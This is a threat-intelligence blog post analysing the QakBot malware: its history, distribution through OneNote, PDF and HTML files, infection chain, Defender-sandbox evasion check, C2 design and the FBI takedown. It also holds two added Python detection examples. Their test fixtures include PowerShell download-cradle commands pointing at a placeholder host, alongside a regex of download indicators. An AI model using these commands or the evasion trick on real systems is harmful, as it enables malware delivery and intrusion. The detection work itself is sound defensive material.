QakBot, One of The Most Observed Malware

Qakbot, a versatile second-stage malware with backdoor capabilities, was initially designed as a credential stealer. Remarkably, it has remained operational to the present day. It is so relevant that in Proofpoint’s 2022 phishing report, QakBot was, along with Emotet, one of the top malware families observed. Again, in spring 2023, QakBot was the most common malware family.

Classified as a credential stealer, banking trojan, worm, and Remote Access Trojan (RAT), Qakbot steals sensitive data and endeavors to propagate itself across other systems within the network. Furthermore, Qakbot boasts Remote Code Execution (RCE) capabilities, empowering attackers to conduct manual attacks to accomplish secondary goals, such as scanning compromised networks or introducing ransomware. To put it simply, Qakbot is a modular malware that encompasses a multitude of malicious functionalities.

Figure 1. SOCRadar Cyber Threat Intelligence Module, Threat Actor/Malware Tab

Of course, this versatile malware has served as a helpful weapon among various threat actors. Prominent ransomware operations, most notably Black Basta, alongside other major ransomware operators, including REvil, LockBit, and Conti, have harnessed Qakbot to spread significant ransomware strains over the years. The diverse modules of Qakbot facilitate automated targeting of financial information, locally stored emails, system passwords or their hashes, website credentials, and web browser cache and cookies.

Moreover, the malware can capture keystrokes to pilfer entered credentials. Security experts observed attacks utilizing Qakbot malware to breach networks and deploy ransomware in under half a day. These capabilities of the malware underscored a growing trend of collaboration in cybercrime, wherein groups like the Qakbot malware collective expand their influence by vending initial access through their malware to other threat actors.

More Than a Decade Long Activity

Unearthed in 2008, Qakbot has witnessed continuous enhancements throughout its existence, with its prevalence fluctuating in tandem with its update cycles. Subsequent to the availability of updated versions in 2015, Qakbot experienced a resurgence; in 2020, security analysts observed a staggering 465 percent surge in its year-over-year share of cyber assaults following the release of a novel Qakbot variant (BlackBerry). The year 2021 saw Qakbot leveraged in the significant cyber intrusion targeting JBS, which disrupted the company’s meat production facilities and necessitated an $11 million ransom payment. Throughout 2022, numerous operations conducted by the Black Basta ransomware group integrated Qakbot. Even in 2023, new vectors for Qakbot distribution and new C2 servers have emerged, attesting to the persistent nature of the threat.

Figure 2. QakBot Infection Rate. (Trellix)

According to Trellix research in early 2023, the propagation of this malware primarily occurred through phishing emails and malicious attachments. However, it is noteworthy that Qakbot has also been identified as a secondary payload delivered by other botnets such as Emotet. As mentioned above, Qakbot has been utilized to deploy ransomware strains like Prolock, Egregor, and DoppelPaymer. Moreover, it was previously linked with TA570, which frequently employs this malware as an initial entry point in its campaigns. Despite persistent efforts spanning over a decade to combat its impact, Qakbot continues to pose a substantial threat to individuals and organizations worldwide.

Figure 3. Global heatmap of Qakbot detection in Q1 2023. (Trellix)

Numerous Qakbot infections have been identified, with significant outbreaks detected across multiple countries. Notably, the United States, India, Turkey, and Thailand have witnessed considerable infections. Interestingly, these campaigns are not aimed at a specific industry or nation. Among the sectors affected, the Banking, Financial, and Wealth Management sectors exhibited the highest count of infected IoCs, followed by Government and Outsourcing.

Recent Dismantling of Qakbot Infrastructure

Lastly, on August 29, 2023, in what marked one of the largest-ever U.S.-led enforcement actions against a botnet, the FBI announced the dismantling of the Qakbot botnet through a collaborative international law enforcement effort. The operation involved not only the seizure of the botnet’s infrastructure but also the removal of the malicious software from compromised devices.

In the initiative named Operation Duck Hunt, which took place over the weekend, the FBI skillfully rerouted the botnet’s communication network to servers under its authority. This strategic move enabled agents to pinpoint around 700,000 devices the botnet had compromised.

While this development will significantly disrupt the QakBot operation, one detail that should not be forgotten is that the operation did not involve arresting the malware’s operators. Therefore, as in the past, QakBot may return in the same or another form, even if it is less dangerous for a while.

New Distribution Vectors

An action taken by Microsoft in the past year, disabling macros by default in Office documents downloaded from the internet, changed many malware distribution methods. As Microsoft states: “VBA macros are a common way for malicious actors to gain access to deploy malware and ransomware. Therefore, to help improve security in Office, we’re changing the default behavior of Office applications to block macros in files from the internet.” However, threat actors were able to adapt quickly to this new situation. Shortly after this decision, malicious OneNote attachments were caught on the radar of the entire security community as a common vector. QakBot also appeared as one of the malware families distributed over this vector.

Figure 4. Mails distributing malicious .one attachments for QakBot. (Sophos)

Starting from January 31, Qakbot adopted the utilization of OneNote .one documents, also known as “Notebooks” in Microsoft’s terminology, as part of its attack strategy. During this period, Sophos identified two concurrent spam campaigns orchestrated by Qakbot. In the first campaign, the malicious emails incorporate a hyperlink that prompts the recipient to download a weaponized .one file. Notably, these versions of the malicious spam messages feature the recipient’s surname repeated within the subject line, although the content of the messages is generally lacking in personalization. The second campaign involves a technique referred to as “message thread injections.” In this scenario, participants in an existing conversation receive a “reply-all” message, seemingly originating from the user of an infected computer, accompanied by a tainted OneNote notebook attachment.

How Does QakBot Function?

Qakbot predominantly propagates through the manipulation of emails and the use of social engineering strategies. As mentioned above, earlier this year, Qakbot adopted the method of spreading through OneNote files. However, a subsequent shift occurred in March, when Qakbot started utilizing PDF and HTML files as well to serve as the initial vectors of attack. These files were employed to download additional stage files, ultimately culminating in the delivery of the final malicious payload. Threat actors frequently use these file formats to target and compromise users.

Figure 5. Overview of the infection chain; the chain may vary slightly in each attack.

The .one, PDF, and HTML attachments in these spam mails can redirect victims to download a malicious ZIP file that drops a VBS script, or, in the case of PDFs, run a PowerShell command via an obfuscated JS file that downloads another payload. The actual QakBot payload is loaded onto the system in this manner.

In an analysis from Zscaler researchers, it is noted that some QakBot campaigns aim to gain initial access through .xll files. The consistent element across these various initial access strategies, which differ from one campaign to another, is that they kick off with a spam email carrying a malicious attachment. These attacks then progress to incorporate file formats commonly employed in daily use, primarily those associated with Microsoft products.

Moving on to the subsequent phase of the attack, a script file is extracted from the compressed archive. This script file subsequently initiates a PowerShell command, establishing communication with a C2 server, as illustrated in the provided example. Following this communication, the QakBot payload is fetched and executed.
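As an added example (not code from the article or from any of the cited vendors), the following Python detection logic runs over constructed process-creation events and flags the lineage described above: a script host running an archive-dropped VBS file that spawns PowerShell, which then pulls content over HTTP. It also tolerates an intermediate cmd.exe hop, since the chain varies between campaigns. The event field names, the indicator list and the example paths and hosts are assumptions.

```python
import re

# Process-creation events, constructed for this example (not real telemetry).
# Event 303 is the direct wscript.exe -> powershell.exe chain; events 505/606
# show a variant with cmd.exe in between; event 404 is benign admin activity.
SAMPLE_EVENTS = [
    {"pid": 101, "ppid": 1,   "image": "explorer.exe",   "cmd": "explorer.exe"},
    {"pid": 202, "ppid": 101, "image": "wscript.exe",
     "cmd": r'wscript.exe "C:\Users\u\AppData\Local\Temp\Invoice.vbs"'},
    {"pid": 303, "ppid": 202, "image": "powershell.exe",
     "cmd": "powershell.exe -w hidden (New-Object Net.WebClient).DownloadString('http://example.invalid/page')"},
    {"pid": 404, "ppid": 101, "image": "powershell.exe", "cmd": "powershell.exe Get-ChildItem C:\\Logs"},
    {"pid": 505, "ppid": 202, "image": "cmd.exe",        "cmd": "cmd.exe /c start"},
    {"pid": 606, "ppid": 505, "image": "powershell.exe",
     "cmd": "powershell.exe Invoke-WebRequest http://example.invalid/a -OutFile x.dll"},
]

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Command-line fragments indicating that PowerShell is fetching content over HTTP.
NET_INDICATORS = re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient|https?://", re.I)

def ancestry(by_pid, pid, depth=4):
    """Walk parent links upward from pid (child first), at most `depth` hops."""
    chain = []
    while pid in by_pid and len(chain) < depth:
        chain.append(by_pid[pid])
        pid = by_pid[pid]["ppid"]
    return chain

def find_chain_alerts(events, depth=4):
    """Return pid chains (child first) for every PowerShell process that carries a
    download indicator and has a script-host ancestor within `depth` hops."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        if e["image"].lower() != "powershell.exe" or not NET_INDICATORS.search(e["cmd"]):
            continue
        chain = ancestry(by_pid, e["pid"], depth)
        if any(a["image"].lower() in SCRIPT_HOSTS for a in chain[1:]):
            alerts.append([a["pid"] for a in chain])
    return alerts

if __name__ == "__main__":
    for chain in find_chain_alerts(SAMPLE_EVENTS):
        print("suspicious lineage (child -> parent):", chain)
```

The same lineage rule can be expressed as a Sigma or EDR query on parent image plus command line; the ancestry walk is what keeps it from being defeated by one extra intermediate process.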

Figure 6. Deobfuscated PowerShell command. (Zscaler)

Figure 7. It downloads the files to the system with HTTP GET requests to various pages.

Upon execution of a sample, Qakbot checks whether it is running inside the Windows Defender Sandbox environment. This check is carried out using the GetFileAttributesW() function: the malware looks for the existence of a directory named “C:\INTERNAL__empty.” If this directory is found, Qakbot terminates itself. This behavior underscores the malware’s adeptness at eluding analysis within confined, sandboxed environments, serving as a testament to its advanced nature.

Figure 8. Windows Defender Sandbox evasion checks by QakBot. (Zscaler)

Furthermore, the process of unpacking the Qakbot malware is relatively uncomplicated in the analyzed sample, making use of the VirtualAlloc() API to allocate memory space for its execution. Upon unpacking, the payload unveils two distinct components housed within the Bitmap section: COMPONENT_07 and COMPONENT_08. Within COMPONENT_07 lies the encrypted campaign ID, while COMPONENT_08 contains the encrypted configurations for the Qakbot C2.

Of note, Qakbot operators employ a clever strategy to ensure the continuous functionality of their C2 infrastructure, effectively sidestepping security measures. Qakbot repurposes compromised victim machines into additional C2 nodes to maintain its robustness. QakBot’s C2 network is structured with a hierarchical design. In this arrangement, lower-level C2 nodes, which often consist of machines from prior victims, establish communication with higher-level Tier 2 C2 nodes. These Tier 2 nodes are hosted on Virtual Private Server (VPS) providers in Russia. Over a quarter of these C2 nodes remain operational for less than a day, and around half of them are active for no more than a week.

After unpacking, QakBot may initiate communication with its C2 server using HTTP and TLS. The core protocol involves the utilization of a JSON object that is enclosed within an encrypted message. This encrypted message is subsequently encoded in base64 format. 
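The message format just described suggests a simple triage heuristic for outbound HTTP POST bodies: content that strictly base64-decodes but is neither readable JSON nor low-entropy text is worth a closer look. This is an added example, not code from the article or from Sophos; it assumes the base64 text makes up the whole POST body, and the length and entropy thresholds are chosen for illustration.

```python
import base64
import binascii
import json
import math
from collections import Counter

def shannon_entropy(data: bytes) -> float:
    """Bits per byte; 8.0 means every byte value occurs equally often."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())

def classify_post_body(body: str, min_len: int = 32, threshold: float = 6.0) -> str:
    """Triage label for a POST body, following the described format of
    base64 wrapping an encrypted message that itself carries JSON.
    min_len and threshold are assumptions for this example."""
    raw = body.strip()
    if len(raw) < min_len:
        return "too_short"
    try:
        decoded = base64.b64decode(raw, validate=True)   # reject non-alphabet chars
    except (binascii.Error, ValueError):
        return "not_base64"
    try:
        json.loads(decoded.decode("utf-8"))
        return "base64_plain_json"        # readable JSON, nothing encrypted
    except ValueError:                    # UnicodeDecodeError and JSONDecodeError
        pass
    if shannon_entropy(decoded) >= threshold:
        return "base64_high_entropy_blob" # opaque bytes: encrypted or compressed
    return "base64_low_entropy"

# Constructed sample bodies (not captured traffic). The ciphertext stand-in is a
# uniform byte pattern, so its entropy is known to be exactly 8.0 bits per byte.
CONSTRUCTED_BODIES = {
    "form":      "user=alice&session=0123456789abcdef0123456789abcdef",
    "api_json":  base64.b64encode(b'{"status":"ok","items":[1,2,3],"user":"alice"}').decode(),
    "padding":   base64.b64encode(b"A" * 48).decode(),
    "encrypted": base64.b64encode(bytes(range(256)) * 2).decode(),
}

def triage_all(bodies=CONSTRUCTED_BODIES):
    return {name: classify_post_body(body) for name, body in bodies.items()}

if __name__ == "__main__":
    for name, label in triage_all().items():
        print(f"{name:10s} -> {label}")
```

Many legitimate applications also post base64-wrapped binary data, so treat the label as a prioritisation signal to combine with destination reputation and the sending process's lineage, not as a verdict.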

Figure 9. An example of an HTTP POST request sent by QBOT to its C2. (Sophos)

QakBot receives instructions from its C2 via this established communication channel. In addition to administrative commands, this modular malware might incorporate functionalities like a reverse shell server, proxy support and various other capabilities. At this point, QakBot is installed on the victim system as a Remote Access Trojan, enabling the attacker to take its desired action.


To sum up, QakBot is still active and remains a threat that organizations and users must consider. The strategic action taken by Microsoft in the past year, aimed at enhancing Windows security by disabling macros from the internet by default, forced the threat actors to evolve their tactics once again. While this move was intended to bolster cybersecurity, threat actors swiftly pivoted to new distribution vectors, with malicious OneNote attachments emerging as a prominent avenue. This adaptation demonstrated the agility of cybercriminals in circumventing security measures to achieve their goals. QakBot’s integration of OneNote documents into its attack strategy exemplifies the dynamic and innovative techniques threat actors employ to infiltrate systems and networks.

Thus, it is the responsibility of organizations and users to take proactive measures against threat actors and stay one step ahead of them. In this endeavor, SOCRadar can help you establish this proactive understanding of security, here is how:

  1. Threat Detection and Analysis: SOCRadar collects data from every part of the Internet and can detect IoCs associated with QakBot, like domain names, IP addresses, hashes, and more. On the SOCRadar Platform, you can access over 50,000 QakBot-related IoCs and integrate them into your security systems.
  2. Vulnerability Intelligence: SOCRadar Vulnerability Intelligence may help your organization to identify vulnerabilities in your systems that could be exploited by malware like QakBot. By patching or securing these vulnerabilities, the risk of infection can be reduced.
  3. Real-time Alerts: Besides the Vulnerability Intelligence included in the SOCRadar Platform, we provide real-time alerts when we detect any potential threats related to your assets that may become an initial access method for various threat actors. This enables security teams to respond promptly to mitigate the risk.
  4. Malware Analysis: The SOCRadar Platform may also help you analyze various malware strains or suspected files, including .EML files, which are the primary vector for malware infections like QakBot. By presenting a detailed report as well as a verdict on whether the file is malicious, we provide insights into the TTPs used by the malware, which helps in understanding its modus operandi.

The post QakBot, One of The Most Observed Malware appeared first on SOCRadar® Cyber Intelligence Inc.
